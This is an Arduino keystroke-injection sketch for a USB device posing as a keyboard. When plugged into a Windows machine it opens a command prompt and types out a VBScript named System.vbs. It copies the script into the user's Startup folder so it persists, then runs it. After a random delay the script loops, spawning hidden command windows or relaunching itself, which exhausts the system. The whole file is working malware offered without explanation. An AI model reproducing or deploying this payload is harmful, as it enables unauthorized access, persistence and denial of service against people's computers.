#include <Keyboard.h>
void setup()
{
  Keyboard.begin();
  delay(800);
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press(114);
  Keyboard.releaseAll();
  delay(200);
  Keyboard.print("cmd");
  typeKey(KEY_RETURN);
  delay(500);
  Keyboard.print("set copycmd=/y");
  typeKey(KEY_RETURN);
  delay(80);
  Keyboard.print("copy con System.vbs");
  typeKey(KEY_RETURN);
  delay(80);
  Keyboard.print("Dim max,min,rand");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("max=1200000");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("min=60000");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("Randomize");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("rand = Int((max-min+1)*Rnd+min)");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("WScript.Sleep rand");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("Dim maxy,miny,randy");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("maxy=100");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("miny=1");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("Randomize");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("randy = Int((maxy-miny+1)*Rnd+miny)");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("If randy Mod 6 = 0 Then");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("d = randy");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("v = 0");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("Else");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("d = 4");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("v = 1");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("End If");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("If d Mod 5 = 0 Then");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("z = 0");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("Else");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("z = 1");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("End If");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("Do until v = 1");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("CreateObject(\"Wscript.Shell\").Run \"cmd\", 0, False");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("Loop");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("Do until z = 1");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("CreateObject(\"Wscript.Shell\").Run Wscript.ScriptName");
  typeKey(KEY_RETURN);
  delay(30);
  Keyboard.print("Loop");
  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press(122);
  Keyboard.releaseAll();
  typeKey(KEY_RETURN);
  delay(80);
  Keyboard.print("copy ");
  Keyboard.print(F("\""));
  Keyboard.print("%USERPROFILE%");
  Keyboard.print(F("\\"));
  Keyboard.print("System.vbs");
  Keyboard.print(F("\""));
  Keyboard.print(" ");
  Keyboard.print(F("\""));
  Keyboard.print("%USERPROFILE%");
  Keyboard.print(F("\\"));
  Keyboard.print("Start Menu");
  Keyboard.print(F("\\"));
  Keyboard.print("Programs");
  Keyboard.print(F("\\"));
  Keyboard.print("Startup");
  Keyboard.print(F("\""));
  typeKey(KEY_RETURN); 
  delay(80);
  Keyboard.print("start System.vbs && exit");
  typeKey(KEY_RETURN);
  delay(50);
}
void typeKey(int key)
{
  Keyboard.press(key);
  delay(30);
  Keyboard.release(key);
}
void loop() {}
